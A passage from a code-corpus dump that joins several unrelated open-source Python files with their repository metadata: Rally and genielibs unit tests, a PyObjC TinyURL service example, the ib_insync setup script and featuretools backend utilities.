TIME_FORMAT = "%Y-%m-%dT%H:%M:%S%z"
data = {"created_at": dt.date(2017, 2, 3),
"updated_at": dt.date(2017, 3, 3),
"id": "v_id",
"env_uuid": "d_uuid",
"uuid": "v_uuid",
"verifier_uuid": "v_uuid",
"unexpected_success": "2",
"status": "False",
"tests": {"test1": "tdata1",
"test2": "tdata2"},
"skipped": 2,
"tests_duration": "",
"tags": None,
"run_args": "args",
"success": 0,
"expected_failures": 2,
"tests_count": 3,
"failures": 2}
verification = objects.Verification(copy.deepcopy(data))
result = verification.to_dict()
data["created_at"] = data["created_at"].strftime(TIME_FORMAT)
data["updated_at"] = data["updated_at"].strftime(TIME_FORMAT)
data["deployment_uuid"] = data["env_uuid"]
self.assertEqual(data, result)
@mock.patch("rally.common.objects.verification.db.verification_create")
def test_create(self, mock_verification_create):
objects.Verification.create("some-verifier", "some-deployment", [], {})
mock_verification_create.assert_called_once_with(
"some-verifier", "some-deployment", [], {})
@mock.patch("rally.common.objects.verification.db.verification_get")
def test_get(self, mock_verification_get):
mock_verification_get.return_value = self.db_obj
v = objects.Verification.get(self.db_obj["uuid"])
mock_verification_get.assert_called_once_with(self.db_obj["uuid"])
self.assertEqual(self.db_obj["uuid"], v.uuid)
@mock.patch("rally.common.objects.verification.db.verification_list")
def test_list(self, mock_verification_list):
mock_verification_list.return_value = [self.db_obj]
vs = objects.Verification.list()
mock_verification_list.assert_called_once_with(None, None, None, None)
self.assertEqual(self.db_obj["uuid"], vs[0].uuid)
@mock.patch("rally.common.objects.verification.db.verification_delete")
def test_delete(self, mock_verification_delete):
objects.Verification(self.db_obj).delete()
mock_verification_delete.assert_called_once_with(self.db_obj["uuid"])
@mock.patch("rally.common.objects.verification.db.verification_update")
def test_update_status(self, mock_verification_update):
v = objects.Verification(self.db_obj)
v.update_status(status="some-status")
mock_verification_update.assert_called_once_with(self.db_obj["uuid"],
status="some-status")
@mock.patch("rally.common.objects.verification.db.verification_update")
def test_finish(self, mock_verification_update):
v = objects.Verification(self.db_obj)
totals = {
"tests_count": 2,
"tests_duration": 0.54,
"success": 2,
"skip": 0,
"expected_failures": 0,
"unexpected_success": 0,
"failures": 0
}
tests = {
"foo_test[gate,negative]": {
"name": "foo_test",
"duration": 0.25,
"status": "success",
"tags": ["gate", "negative"]
},
"bar_test[gate,negative]": {
"name": "bar_test",
"duration": 0.29,
"status": "success",
"tags": ["gate", "negative"]
}
}
v.finish(totals, tests)
mock_verification_update.assert_called_once_with(
self.db_obj["uuid"], status=consts.VerificationStatus.FINISHED,
tests=tests, **totals)
v = objects.Verification(self.db_obj)
totals.update(failures=1)
mock_verification_update.reset_mock()
v.finish(totals, tests)
mock_verification_update.assert_called_once_with(
self.db_obj["uuid"], status=consts.VerificationStatus.FAILED,
tests=tests, **totals)
v = objects.Verification(self.db_obj)
totals.update(failures=0, unexpected_success=1)
mock_verification_update.reset_mock()
v.finish(totals, tests)
mock_verification_update.assert_called_once_with(
self.db_obj["uuid"], status=consts.VerificationStatus.FAILED,
tests=tests, **totals)
@mock.patch("rally.common.objects.verification.db.verification_update")
def test_set_error(self, mock_verification_update):
v = objects.Verification(self.db_obj)
v.set_error("Some error")
mock_verification_update.assert_called_once_with(
self.db_obj["uuid"], status=consts.VerificationStatus.CRASHED)
|
5a222a34d00331a757ad831b568e09b941ce3105
|
f509ab9825c542e09b0c6591d86ef1f9feb540a6
|
/pkgs/clean-pkg/src/genie/libs/clean/stages/iosxe/tests/test_install_image.py
|
1724b2a8cd6c0a70c1489ffeb96e23474d82f277
|
[
"Apache-2.0"
] |
permissive
|
CiscoTestAutomation/genielibs
|
97f597117193aaa18028defeb69078ebb241173a
|
e42e51475cddcb10f5c7814d0fe892ac865742ba
|
refs/heads/master
| 2023-08-11T16:39:41.959947
| 2023-07-27T17:58:42
| 2023-07-27T17:58:42
| 130,717,047
| 109
| 60
|
Apache-2.0
| 2023-08-29T22:32:08
| 2018-04-23T15:21:56
|
Python
|
UTF-8
|
Python
| false
| false
| 14,355
|
py
|
test_install_image.py
|
import logging
import unittest
from unittest.mock import Mock, MagicMock, call, ANY
from collections import OrderedDict
from genie.libs.clean.stages.iosxe.stages import InstallImage
from genie.libs.clean.stages.tests.utils import CommonStageTests, create_test_device
from pyats.aetest.steps import Steps
from pyats.results import Passed, Failed, Skipped
from pyats.aetest.signals import TerminateStepSignal
# Disable logging. It may be useful to comment this out when developing tests.
logging.disable(logging.CRITICAL)
class DeleteBootVariable(unittest.TestCase):
def setUp(self):
# Instantiate class object
self.cls = InstallImage()
# Instantiate device object. This also sets up commonly needed
# attributes and Mock objects associated with the device.
self.device = create_test_device('PE1', os='iosxe')
def test_pass(self):
# Make sure we have a unique Steps() object for result verification
steps = Steps()
# Call the method to be tested (clean step inside class)
self.cls.delete_boot_variable(
steps=steps, device=self.device
)
# Check that the result is expected
self.assertEqual(Passed, steps.details[0].result)
def test_fail_to_delete_boot_variables(self):
# Make sure we have a unique Steps() object for result verification
steps = Steps()
# And we want the configure method to raise an exception when called.
# This simulates the fail case.
self.device.configure = Mock(side_effect=Exception)
# We expect this step to fail so make sure it raises the signal
with self.assertRaises(TerminateStepSignal):
self.cls.delete_boot_variable(
steps=steps, device=self.device
)
# Check the overall result is as expected
self.assertEqual(Failed, steps.details[0].result)
class SetBootVariable(unittest.TestCase):
def setUp(self):
# Instantiate class object
self.cls = InstallImage()
# Instantiate device object. This also sets up commonly needed
# attributes and Mock objects associated with the device.
self.device = create_test_device('PE1', os='iosxe')
def test_pass(self):
# Make sure we have a unique Steps() object for result verification
steps = Steps()
data = {'dir bootflash:/': '''
Directory of bootflash:/
11 drwx 16384 Nov 25 2016 19:32:53 -07:00 lost+found
12 -rw- 0 Dec 13 2016 11:36:36 -07:00 ds_stats.txt
104417 drwx 4096 Apr 10 2017 09:09:11 -07:00 .prst_sync
80321 drwx 4096 Nov 25 2016 19:40:38 -07:00 .rollback_timer
64257 drwx 4096 Nov 25 2016 19:41:02 -07:00 .installer
48193 drwx 4096 Nov 25 2016 19:41:14 -07:00 virtual-instance-stby-sync
8033 drwx 4096 Nov 25 2016 18:42:07 -07:00 test.bin
1940303872 bytes total (1036210176 bytes free)
'''
}
# And we want the execute method to be mocked with device console output.
self.device.execute = Mock(return_value = data['dir bootflash:/'])
def mock_execute(*args, **kwargs):
assert args == ('puts [open "bootflash:/packages.conf" w+] {}',)
self.device.tclsh = mock_execute
# And we want the execute_set_boot_variable api to be mocked.
# This simulates the pass case.
self.device.api.execute_set_boot_variable = Mock()
# Call the method to be tested (clean step inside class)
self.cls.set_boot_variable(
steps=steps, device=self.device
)
# Check that the result is expected
self.assertEqual(Passed, steps.details[0].result)
def test_fail_to_set_boot_variables(self):
# Make sure we have a unique Steps() object for result verification
steps = Steps()
data = {'dir bootflash:/': '''
Directory of bootflash:/
11 drwx 16384 Nov 25 2016 19:32:53 -07:00 lost+found
12 -rw- 0 Dec 13 2016 11:36:36 -07:00 ds_stats.txt
104417 drwx 4096 Apr 10 2017 09:09:11 -07:00 .prst_sync
80321 drwx 4096 Nov 25 2016 19:40:38 -07:00 .rollback_timer
64257 drwx 4096 Nov 25 2016 19:41:02 -07:00 .installer
48193 drwx 4096 Nov 25 2016 19:41:14 -07:00 virtual-instance-stby-sync
8033 drwx 4096 Nov 25 2016 18:42:07 -07:00 test.bin
1940303872 bytes total (1036210176 bytes free)
'''
}
# And we want the execute method to be mocked with device console output.
self.device.execute = Mock(return_value = data['dir bootflash:/'])
def mock_execute(*args, **kwargs):
assert args == ('puts [open "bootflash:/packages.conf" w+] {}',)
self.device.tclsh = mock_execute
# And we want the execute_set_boot_variable api to raise an exception when called.
# This simulates the fail case.
self.device.api.execute_set_boot_variable = Mock(side_effect=Exception)
# We expect this step to fail so make sure it raises the signal
with self.assertRaises(TerminateStepSignal):
self.cls.set_boot_variable(
steps=steps, device=self.device
)
# Check the overall result is as expected
self.assertEqual(Failed, steps.details[0].result)
class SaveRunningConfig(unittest.TestCase):
def setUp(self):
# Instantiate class object
self.cls = InstallImage()
# Instantiate device object. This also sets up commonly needed
# attributes and Mock objects associated with the device.
self.device = create_test_device('PE1', os='iosxe')
def test_pass(self):
# Make sure we have a unique Steps() object for result verification
steps = Steps()
# And we want the execute_copy_run_to_start api to be mocked.
# This simulates the pass case.
self.device.api.execute_copy_run_to_start = Mock()
# Call the method to be tested (clean step inside class)
self.cls.save_running_config(
steps=steps, device=self.device
)
# Check that the result is expected
self.assertEqual(Passed, steps.details[0].result)
def test_fail_to_save_running_config(self):
# Make sure we have a unique Steps() object for result verification
steps = Steps()
# And we want the execute_copy_run_to_start api to raise an exception when called.
# This simulates the fail case.
self.device.api.execute_copy_run_to_start = Mock(side_effect=Exception)
# We expect this step to fail so make sure it raises the signal
with self.assertRaises(TerminateStepSignal):
self.cls.save_running_config(
steps=steps, device=self.device
)
# Check the overall result is as expected
self.assertEqual(Failed, steps.details[0].result)
class VerifyBootVariable(unittest.TestCase):
def setUp(self):
# Instantiate class object
self.cls = InstallImage()
# Instantiate device object. This also sets up commonly needed
# attributes and Mock objects associated with the device.
self.device = create_test_device('PE1', os='iosxe', platform='cat9k')
def test_pass(self):
# Make sure we have a unique Steps() object for result verification
steps = Steps()
self.cls.new_boot_var = 'bootflash:cat9k_iosxe.BLD_V173_THROTTLE_LATEST_20200421_032634.SSA.bin'
data1 = {'show boot': '''
starfleet-1#show boot
BOOT variable = bootflash:cat9k_iosxe.BLD_V173_THROTTLE_LATEST_20200421_032634.SSA.bin;
Configuration Register is 0x102
MANUAL_BOOT variable = no
BAUD variable = 9600
ENABLE_BREAK variable does not exist
BOOTMODE variable does not exist
IPXE_TIMEOUT variable does not exist
CONFIG_FILE variable =
'''
}
# And we want the verify_boot_variable api to be mocked.
# This simulates the pass case.
self.device.execute = Mock(return_value=data1['show boot'])
# Call the method to be tested (clean step inside class)
self.cls.verify_boot_variable(
steps=steps, device=self.device
)
# Check that the result is expected
self.assertEqual(Passed, steps.details[0].result)
def test_fail_to_verify_boot_variables(self):
# Make sure we have a unique Steps() object for result verification
steps = Steps()
self.cls.new_boot_var = 'flash:cat9k_iosxe.BLD_V173_999.SSA.bin'
data1 = {'show boot': '''
starfleet-1#show boot
BOOT variable = bootflash:cat9k_iosxe.BLD_V173_THROTTLE_LATEST_20200421_032634.SSA.bin;
Configuration Register is 0x102
MANUAL_BOOT variable = no
BAUD variable = 9600
ENABLE_BREAK variable does not exist
BOOTMODE variable does not exist
IPXE_TIMEOUT variable does not exist
CONFIG_FILE variable =
'''
}
# And we want the verify_boot_variable api to be mocked.
# This simulates the fail case.
self.device.execute = Mock(return_value=data1['show boot'])
# And we want the execute_copy_run_to_start api to raise an exception when called.
# This simulates the fail case.
self.device.api.execute_copy_run_to_start = Mock(side_effect=Exception)
# We expect this step to fail so make sure it raises the signal
with self.assertRaises(TerminateStepSignal):
self.cls.save_running_config(
steps=steps, device=self.device
)
# Check the overall result is as expected
self.assertEqual(Failed, steps.details[0].result)
class Installimage(unittest.TestCase):
def setUp(self):
# Instantiate class object
self.cls = InstallImage()
# Instantiate device object. This also sets up commonly needed
# attributes and Mock objects associated with the device.
self.device = create_test_device('PE1', os='iosxe')
def test_pass(self):
# Make sure we have a unique Steps() object for result verification
steps = Steps()
images = ['/auto/some-location/that-this/image/stay-isr-image.bin']
self.cls.new_boot_var = 'flash:cat9k_iosxe.BLD_V173_999.SSA.bin'
self.cls.history = OrderedDict()
self.cls.mock_value = OrderedDict()
setattr(self.cls.mock_value, 'parameters', {})
self.cls.history.update({'InstallImage': self.cls.mock_value})
self.cls.history['InstallImage'].parameters = OrderedDict()
# And we want the verify_boot_variable api to be mocked.
# This simulates the pass case.
self.device.reload = Mock()
self.device.execute = Mock()
# Call the method to be tested (clean step inside class)
self.cls.install_image(
steps=steps, device=self.device, images=images
)
# Check that the result is expected
self.assertEqual(Passed, steps.details[0].result)
def test_fail_to_install_image(self):
# Make sure we have a unique Steps() object for result verification
steps = Steps()
images = ['/auto/some-location/that-this/image/stay-isr-image.bin']
self.cls.history = {}
# And we want the verify_boot_variable api to be mocked.
# This simulates the fail case.
self.device.reload = Mock(side_effect=Exception)
# We expect this step to fail so make sure it raises the signal
with self.assertRaises(TerminateStepSignal):
self.cls.install_image(
steps=steps, device=self.device, images=images
)
# Check the overall result is as expected
self.assertEqual(Failed, steps.details[0].result)
class TestInstallImage(unittest.TestCase):
def test_iosxe_install_image_pass(self):
steps = Steps()
cls = InstallImage()
cls.history = MagicMock()
cls.new_boot_var = 'image.bin'
device = Mock()
device.reload = Mock()
cls.install_image(steps=steps, device=device, images=['sftp://server/image.bin'])
device.reload.assert_has_calls([
call('install add file sftp://server/image.bin activate commit', reply=ANY,
reload_creds='default', prompt_recovery=True, append_error_pattern=['FAILED:.* '],
timeout=500)
])
self.assertEqual(Passed, steps.details[0].result)
def test_iosxe_install_image_skip(self):
steps = Steps()
cls = InstallImage()
cls.history = MagicMock()
device = Mock()
device.api.get_running_image.return_value = 'sftp://server/image.bin'
cls.install_image(steps=steps, device=device, images=['sftp://server/image.bin'])
self.assertEqual(Skipped, steps.details[0].result)
def test_iosxe_install_image_grub_boot_image(self):
steps = Steps()
cls = InstallImage()
cls.history = MagicMock()
cls.new_boot_var = 'image.bin'
device = Mock()
device.reload = Mock()
cls.install_image(steps=steps, device=device, images=['sftp://server/image.bin'],
reload_service_args=dict(grub_boot_image='packages.conf'))
device.reload.assert_has_calls([
call('install add file sftp://server/image.bin activate commit', reply=ANY,
reload_creds='default', prompt_recovery=True, append_error_pattern=['FAILED:.* '],
grub_boot_image='packages.conf', timeout=500)
])
self.assertEqual(Passed, steps.details[0].result)
|
373f4a0c1fa15abfe917ecaf836c6dbc2567f44a
|
f80ef3a3cf859b13e8af8433af549b6b1043bf6e
|
/pyobjc-framework-Cocoa/Examples/AppKit/TinyURLService/TinyURLService.py
|
6bd5584991439eb435a131e1a2e8b6ebe61e6784
|
[
"MIT"
] |
permissive
|
ronaldoussoren/pyobjc
|
29dc9ca0af838a56105a9ddd62fb38ec415f0b86
|
77b98382e52818690449111cd2e23cd469b53cf5
|
refs/heads/master
| 2023-09-01T05:15:21.814504
| 2023-06-13T20:00:17
| 2023-06-13T20:00:17
| 243,933,900
| 439
| 49
| null | 2023-06-25T02:49:07
| 2020-02-29T08:43:12
|
Python
|
UTF-8
|
Python
| false
| false
| 2,574
|
py
|
TinyURLService.py
|
import traceback
import urllib
import urllib2
import Cocoa
import objc
from PyObjCTools import AppHelper
def serviceSelector(fn):
# this is the signature of service selectors
return objc.selector(fn, signature=b"v@:@@o^@")
def ERROR(s):
# NSLog("ERROR: %s", s)
return s
NAME = "TinyURLService-0.0"
TINYURL_API = "http://tinyurl.com/api-create.php"
def getTinyURL(url):
data = urllib.urlencode({"url": url, "source": NAME})
return urllib2.urlopen(TINYURL_API, data).read().decode("utf-8")
class TinyURLService(Cocoa.NSObject):
@serviceSelector
def doTinyURLService_userData_error_(self, pboard, data, error):
# Mail.app in 10.4.1 doesn't do NSURLPboardType correctly!
# Probably elsewhere too, so we just use strings.
try:
types = pboard.types()
url = None
if Cocoa.NSStringPboardType in types:
urlString = pboard.stringForType_(Cocoa.NSStringPboardType)
url = Cocoa.NSURL.URLWithString_(urlString.strip())
if url is None:
return ERROR(
Cocoa.NSLocalizedString(
"Error: Given URL was not well-formed.",
"Given URL not well-formed.",
)
)
if url is None:
return ERROR(
Cocoa.NSLocalizedString(
"Error: Pasteboard doesn't contain a valid URL.",
"Pasteboard doesn't contain a valid URL.",
)
)
urlString = url.absoluteString()
res = getTinyURL(urlString.UTF8String())
resURL = Cocoa.NSURL.URLWithString_(res)
if resURL is None:
return ERROR(
Cocoa.NSLocalizedString(
"Error: Resultant URL was not well-formed.",
"Resultant URL not well-formed.",
)
)
pboard.declareTypes_owner_([Cocoa.NSStringPboardType], None)
pboard.setString_forType_(resURL.absoluteString(), Cocoa.NSStringPboardType)
return ERROR(None)
except: # noqa: E722, B001
traceback.print_exc()
return ERROR("Exception, see traceback")
def main():
serviceProvider = TinyURLService.alloc().init()
Cocoa.NSRegisterServicesProvider(serviceProvider, "TinyURLService")
AppHelper.runConsoleEventLoop()
if __name__ == "__main__":
main()
|
598e4aaf848e527de1989a249b7364faf73d4a37
|
b7d485ac699f2a52e955ee4d3642e56df59a30ff
|
/setup.py
|
c8c3cfe2d5d6bc602056edcf1f60cc04ea9ce257
|
[
"BSD-3-Clause",
"BSD-2-Clause"
] |
permissive
|
erdewit/ib_insync
|
52c2736d03f60682b786915262540c707a16d7c8
|
04f4c1efbb739c80d6850ef32fca08576bc182c6
|
refs/heads/master
| 2023-09-04T02:59:34.922330
| 2023-09-01T16:05:55
| 2023-09-01T16:05:55
| 97,003,332
| 2,466
| 678
|
BSD-2-Clause
| 2023-08-29T11:15:40
| 2017-07-12T12:09:24
|
Python
|
UTF-8
|
Python
| false
| false
| 1,669
|
py
|
setup.py
|
"""IB-insync setup script."""
import sys
from pathlib import Path
from setuptools import setup
if sys.version_info < (3, 6, 0):
raise RuntimeError("ib_insync requires Python 3.6 or higher")
here = Path(__file__).parent.resolve()
__version__ = ''
with open(here / 'ib_insync/version.py') as f:
exec(f.read())
with open(here / 'README.rst', encoding='utf-8') as f:
long_description = f.read()
setup(
name='ib_insync',
version=__version__,
description='Python sync/async framework for Interactive Brokers API',
long_description=long_description,
url='https://github.com/erdewit/ib_insync',
author='Ewald R. de Wit',
author_email='ewald.de.wit@gmail.com',
license='BSD',
python_requires='>=3.6',
classifiers=[
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'Topic :: Office/Business :: Financial :: Investment',
'License :: OSI Approved :: BSD License',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
'Programming Language :: Python :: 3.9',
'Programming Language :: Python :: 3.10',
'Programming Language :: Python :: 3.11',
'Programming Language :: Python :: 3 :: Only',
],
keywords='ibapi tws asyncio jupyter interactive brokers async',
packages=['ib_insync'],
package_data={'ib_insync': ['py.typed']},
install_requires=['eventkit', 'nest_asyncio',
'dataclasses;python_version<"3.7"',
'backports.zoneinfo;python_version<"3.9"'],
setup_requires=['flake8']
)
|
bd4642b60b777dd7be0cafe6de874d17596b4ff8
|
5e9576c368e98927e2965bd2fb23bd35d9993d69
|
/featuretools/computational_backends/utils.py
|
1da3ff610f937ae9cfc9b62fe6edeb88597bcc19
|
[
"BSD-3-Clause"
] |
permissive
|
alteryx/featuretools
|
c6e319e063e8e84e7684bf232376f95dc5272160
|
c284c2d27a95b81e0bae913ac90df2b02c8f3b37
|
refs/heads/main
| 2023-08-25T12:21:33.945418
| 2023-08-23T16:30:25
| 2023-08-23T16:30:25
| 102,908,804
| 1,783
| 201
|
BSD-3-Clause
| 2023-09-07T18:53:19
| 2017-09-08T22:15:17
|
Python
|
UTF-8
|
Python
| false
| false
| 15,370
|
py
|
utils.py
|
import logging
import os
import typing
import warnings
from datetime import datetime
from functools import wraps
import numpy as np
import pandas as pd
import psutil
from woodwork.logical_types import Datetime, Double
from featuretools.entityset.relationship import RelationshipPath
from featuretools.feature_base import AggregationFeature, DirectFeature
from featuretools.utils import Trie
from featuretools.utils.gen_utils import Library, import_or_none, is_instance
from featuretools.utils.wrangle import _check_time_type, _check_timedelta
dd = import_or_none("dask.dataframe")
logger = logging.getLogger("featuretools.computational_backend")
def bin_cutoff_times(cutoff_time, bin_size):
binned_cutoff_time = cutoff_time.ww.copy()
if type(bin_size) == int:
binned_cutoff_time["time"] = binned_cutoff_time["time"].apply(
lambda x: x / bin_size * bin_size,
)
else:
bin_size = _check_timedelta(bin_size)
binned_cutoff_time["time"] = datetime_round(
binned_cutoff_time["time"],
bin_size,
)
return binned_cutoff_time
def save_csv_decorator(save_progress=None):
def inner_decorator(method):
@wraps(method)
def wrapped(*args, **kwargs):
if save_progress is None:
r = method(*args, **kwargs)
else:
time = args[0].to_pydatetime()
file_name = "ft_" + time.strftime("%Y_%m_%d_%I-%M-%S-%f") + ".csv"
file_path = os.path.join(save_progress, file_name)
temp_dir = os.path.join(save_progress, "temp")
if not os.path.exists(temp_dir):
os.makedirs(temp_dir)
temp_file_path = os.path.join(temp_dir, file_name)
r = method(*args, **kwargs)
r.to_csv(temp_file_path)
os.rename(temp_file_path, file_path)
return r
return wrapped
return inner_decorator
def datetime_round(dt, freq):
"""
round down Timestamp series to a specified freq
"""
if not freq.is_absolute():
raise ValueError("Unit is relative")
# TODO: multitemporal units
all_units = list(freq.times.keys())
if len(all_units) == 1:
unit = all_units[0]
value = freq.times[unit]
if unit == "m":
unit = "t"
# No support for weeks in datetime.datetime
if unit == "w":
unit = "d"
value = value * 7
freq = str(value) + unit
return dt.dt.floor(freq)
else:
assert "Frequency cannot have multiple temporal parameters"
def gather_approximate_features(feature_set):
"""
Find features which can be approximated. Returned as a trie where the values
are sets of feature names.
Args:
feature_set (FeatureSet): Features to search the dependencies of for
features to approximate.
Returns:
Trie[RelationshipPath, set[str]]
"""
approximate_feature_trie = Trie(default=set, path_constructor=RelationshipPath)
for feature in feature_set.target_features:
if feature_set.uses_full_dataframe(feature, check_dependents=True):
continue
if isinstance(feature, DirectFeature):
path = feature.relationship_path
base_feature = feature.base_features[0]
while isinstance(base_feature, DirectFeature):
path = path + base_feature.relationship_path
base_feature = base_feature.base_features[0]
if isinstance(base_feature, AggregationFeature):
node_feature_set = approximate_feature_trie.get_node(path).value
node_feature_set.add(base_feature.unique_name())
return approximate_feature_trie
def gen_empty_approx_features_df(approx_features):
df = pd.DataFrame(columns=[f.get_name() for f in approx_features])
df.index.name = approx_features[0].dataframe.ww.index
return df
def n_jobs_to_workers(n_jobs):
try:
cpus = len(psutil.Process().cpu_affinity())
except AttributeError:
cpus = psutil.cpu_count()
# Taken from sklearn parallel_backends code
# https://github.com/scikit-learn/scikit-learn/blob/27bbdb570bac062c71b3bb21b0876fd78adc9f7e/sklearn/externals/joblib/_parallel_backends.py#L120
if n_jobs < 0:
workers = max(cpus + 1 + n_jobs, 1)
else:
workers = min(n_jobs, cpus)
assert workers > 0, "Need at least one worker"
return workers
def create_client_and_cluster(n_jobs, dask_kwargs, entityset_size):
Client, LocalCluster = get_client_cluster()
cluster = None
if "cluster" in dask_kwargs:
cluster = dask_kwargs["cluster"]
else:
# diagnostics_port sets the default port to launch bokeh web interface
# if it is set to None web interface will not be launched
diagnostics_port = None
if "diagnostics_port" in dask_kwargs:
diagnostics_port = dask_kwargs["diagnostics_port"]
del dask_kwargs["diagnostics_port"]
workers = n_jobs_to_workers(n_jobs)
if n_jobs != -1 and workers < n_jobs:
warning_string = "{} workers requested, but only {} workers created."
warning_string = warning_string.format(n_jobs, workers)
warnings.warn(warning_string)
# Distributed default memory_limit for worker is 'auto'. It calculates worker
# memory limit as total virtual memory divided by the number
# of cores available to the workers (alwasy 1 for featuretools setup).
# This means reducing the number of workers does not increase the memory
# limit for other workers. Featuretools default is to calculate memory limit
# as total virtual memory divided by number of workers. To use distributed
# default memory limit, set dask_kwargs['memory_limit']='auto'
if "memory_limit" in dask_kwargs:
memory_limit = dask_kwargs["memory_limit"]
del dask_kwargs["memory_limit"]
else:
total_memory = psutil.virtual_memory().total
memory_limit = int(total_memory / float(workers))
cluster = LocalCluster(
n_workers=workers,
threads_per_worker=1,
diagnostics_port=diagnostics_port,
memory_limit=memory_limit,
**dask_kwargs,
)
# if cluster has bokeh port, notify user if unexpected port number
if diagnostics_port is not None:
if hasattr(cluster, "scheduler") and cluster.scheduler:
info = cluster.scheduler.identity()
if "bokeh" in info["services"]:
msg = "Dashboard started on port {}"
print(msg.format(info["services"]["bokeh"]))
client = Client(cluster)
warned_of_memory = False
for worker in list(client.scheduler_info()["workers"].values()):
worker_limit = worker["memory_limit"]
if worker_limit < entityset_size:
raise ValueError("Insufficient memory to use this many workers")
elif worker_limit < 2 * entityset_size and not warned_of_memory:
logger.warning(
"Worker memory is between 1 to 2 times the memory"
" size of the EntitySet. If errors occur that do"
" not occur with n_jobs equals 1, this may be the "
"cause. See https://featuretools.alteryx.com/en/stable/guides/performance.html#parallel-feature-computation"
" for more information.",
)
warned_of_memory = True
return client, cluster
def get_client_cluster():
"""
Separated out the imports to make it easier to mock during testing
"""
distributed = import_or_none("distributed")
Client = distributed.Client
LocalCluster = distributed.LocalCluster
return Client, LocalCluster
if dd:
CutoffTimeType = typing.Union[dd.DataFrame, pd.DataFrame, str, datetime]
else:
CutoffTimeType = typing.Union[pd.DataFrame, str, datetime]
def _validate_cutoff_time(
cutoff_time: CutoffTimeType,
target_dataframe,
):
"""
Verify that the cutoff time is a single value or a pandas dataframe with the proper columns
containing no duplicate rows
"""
if is_instance(cutoff_time, dd, "DataFrame"):
msg = (
"cutoff_time should be a Pandas DataFrame: "
"computing cutoff_time, this may take a while"
)
warnings.warn(msg)
cutoff_time = cutoff_time.compute()
if isinstance(cutoff_time, pd.DataFrame):
cutoff_time = cutoff_time.reset_index(drop=True)
if "instance_id" not in cutoff_time.columns:
if target_dataframe.ww.index not in cutoff_time.columns:
raise AttributeError(
"Cutoff time DataFrame must contain a column with either the same name"
' as the target dataframe index or a column named "instance_id"',
)
# rename to instance_id
cutoff_time.rename(
columns={target_dataframe.ww.index: "instance_id"},
inplace=True,
)
if "time" not in cutoff_time.columns:
if (
target_dataframe.ww.time_index
and target_dataframe.ww.time_index not in cutoff_time.columns
):
raise AttributeError(
"Cutoff time DataFrame must contain a column with either the same name"
' as the target dataframe time_index or a column named "time"',
)
# rename to time
cutoff_time.rename(
columns={target_dataframe.ww.time_index: "time"},
inplace=True,
)
# Make sure user supplies only one valid name for instance id and time columns
if (
"instance_id" in cutoff_time.columns
and target_dataframe.ww.index in cutoff_time.columns
and "instance_id" != target_dataframe.ww.index
):
raise AttributeError(
'Cutoff time DataFrame cannot contain both a column named "instance_id" and a column'
" with the same name as the target dataframe index",
)
if (
"time" in cutoff_time.columns
and target_dataframe.ww.time_index in cutoff_time.columns
and "time" != target_dataframe.ww.time_index
):
raise AttributeError(
'Cutoff time DataFrame cannot contain both a column named "time" and a column'
" with the same name as the target dataframe time index",
)
assert (
cutoff_time[["instance_id", "time"]].duplicated().sum() == 0
), "Duplicated rows in cutoff time dataframe."
if isinstance(cutoff_time, str):
try:
cutoff_time = pd.to_datetime(cutoff_time)
except ValueError as e:
raise ValueError(f"While parsing cutoff_time: {str(e)}")
except OverflowError as e:
raise OverflowError(f"While parsing cutoff_time: {str(e)}")
else:
if isinstance(cutoff_time, list):
raise TypeError("cutoff_time must be a single value or DataFrame")
return cutoff_time
def _check_cutoff_time_type(cutoff_time, es_time_type):
"""
Check that the cutoff time values are of the proper type given the entityset time type
"""
# Check that cutoff_time time type matches entityset time type
if isinstance(cutoff_time, tuple):
cutoff_time_value = cutoff_time[0]
time_type = _check_time_type(cutoff_time_value)
is_numeric = time_type == "numeric"
is_datetime = time_type == Datetime
else:
cutoff_time_col = cutoff_time.ww["time"]
is_numeric = cutoff_time_col.ww.schema.is_numeric
is_datetime = cutoff_time_col.ww.schema.is_datetime
if es_time_type == "numeric" and not is_numeric:
raise TypeError(
"cutoff_time times must be numeric: try casting " "via pd.to_numeric()",
)
if es_time_type == Datetime and not is_datetime:
raise TypeError(
"cutoff_time times must be datetime type: try casting "
"via pd.to_datetime()",
)
def replace_inf_values(feature_matrix, replacement_value=np.nan, columns=None):
"""Replace all ``np.inf`` values in a feature matrix with the specified replacement value.
Args:
feature_matrix (DataFrame): DataFrame whose columns are feature names and rows are instances
replacement_value (int, float, str, optional): Value with which ``np.inf`` values will be replaced
columns (list[str], optional): A list specifying which columns should have values replaced. If None,
values will be replaced for all columns.
Returns:
feature_matrix
"""
if columns is None:
feature_matrix = feature_matrix.replace([np.inf, -np.inf], replacement_value)
else:
feature_matrix[columns] = feature_matrix[columns].replace(
[np.inf, -np.inf],
replacement_value,
)
return feature_matrix
def get_ww_types_from_features(
features,
entityset,
pass_columns=None,
cutoff_time=None,
):
"""Given a list of features and entityset (and optionally a list of pass
through columns and the cutoff time dataframe), returns the logical types,
semantic tags,and origin of each column in the feature matrix. Both
pass_columns and cutoff_time will need to be supplied in order to get the
type information for the pass through columns
"""
if pass_columns is None:
pass_columns = []
logical_types = {}
semantic_tags = {}
origins = {}
for feature in features:
names = feature.get_feature_names()
for name in names:
logical_types[name] = feature.column_schema.logical_type
semantic_tags[name] = feature.column_schema.semantic_tags.copy()
semantic_tags[name] -= {"index", "time_index"}
if logical_types[name] is None and "numeric" in semantic_tags[name]:
logical_types[name] = Double
if all([f.primitive is None for f in feature.get_dependencies(deep=True)]):
origins[name] = "base"
else:
origins[name] = "engineered"
if pass_columns:
cutoff_schema = cutoff_time.ww.schema
for column in pass_columns:
logical_types[column] = cutoff_schema.logical_types[column]
semantic_tags[column] = cutoff_schema.semantic_tags[column]
origins[column] = "base"
if entityset.dataframe_type in (Library.DASK, Library.SPARK):
target_dataframe_name = features[0].dataframe_name
table_schema = entityset[target_dataframe_name].ww.schema
index_col = table_schema.index
logical_types[index_col] = table_schema.logical_types[index_col]
semantic_tags[index_col] = table_schema.semantic_tags[index_col]
semantic_tags[index_col] -= {"index"}
origins[index_col] = "base"
ww_init = {
"logical_types": logical_types,
"semantic_tags": semantic_tags,
"column_origins": origins,
}
return ww_init
|
4b0dbce59113f0d117bc5ab3737134f64a55ba4e
|
f576f0ea3725d54bd2551883901b25b863fe6688
|
/sdk/eventhub/azure-eventhub-checkpointstoreblob-aio/azure/eventhub/extensions/checkpointstoreblobaio/_vendor/storage/blob/_generated/aio/operations/_directory_operations.py
|
338ff69e3adcf8cdad6c86df65fd52c45cfcf5bf
|
[
"MIT",
"LicenseRef-scancode-generic-cla",
